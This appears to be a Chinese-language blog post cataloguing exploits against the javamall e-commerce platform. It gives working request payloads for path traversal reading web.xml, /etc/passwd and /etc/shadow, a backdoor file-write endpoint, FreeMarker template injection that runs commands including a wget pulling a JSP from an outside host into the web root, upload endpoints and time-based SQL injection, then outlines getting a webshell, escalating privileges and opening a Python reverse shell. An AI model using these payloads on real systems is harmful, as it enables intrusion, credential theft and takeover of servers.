黑盒测试之 javamall通用漏洞

1.任意文件下载
/docs/tags/try.html?filename=../../../WEB-INF/web.xml
/docs/tags/try.html?filename=../../../../../../../../../../../../etc/passwd
/docs/tags/try.html?filename=../../../../../../../../../../../../etc/shadow

2.自带后门接口
/api/base/tagTestCreate.do?filename=1.txt&content=111 //写文件接口 /docs/tags/runtime/1.txt
#默认写入 /docs/tags/runtime/1.txt 目录

3.红包文件下载
/excel/bonus.xls

4.命令执行漏洞
<#assign ex=”freemarker.template.utility.Execute”?new()>${ex(“pwd”)}
<#assign ex=”freemarker.template.utility.Execute”?new()> ${ex(“wget http://0535code.com/demo.jsp -O /mnt/domains/demo.jsp”)}

5.上传漏洞
POST /eop/ckuploader.do?CKEditor=remark&CKEditorFuncNum=2&langCode=zh-cn
POST /eop/upload!upload.do?ajax=1

6.搜索功能时间延迟SQL注入
/search-cat-102-tag-1* #参考 http://0535code.com/article/20161111_1238.shtml

######################################################################

仔细分析了下getshell的流程:
1.任意文件上传或命令执行,可以上传webshell,但是要知道jsp可执行目录,如果不知道的话要修改web.xml文件,要对java的环境熟悉一些,拿到webshell后,再提权;
2.可以通过命令执行直接反弹shell,我是用python反弹shell了。

发表评论

电子邮件地址不会被公开。 必填项已用*标注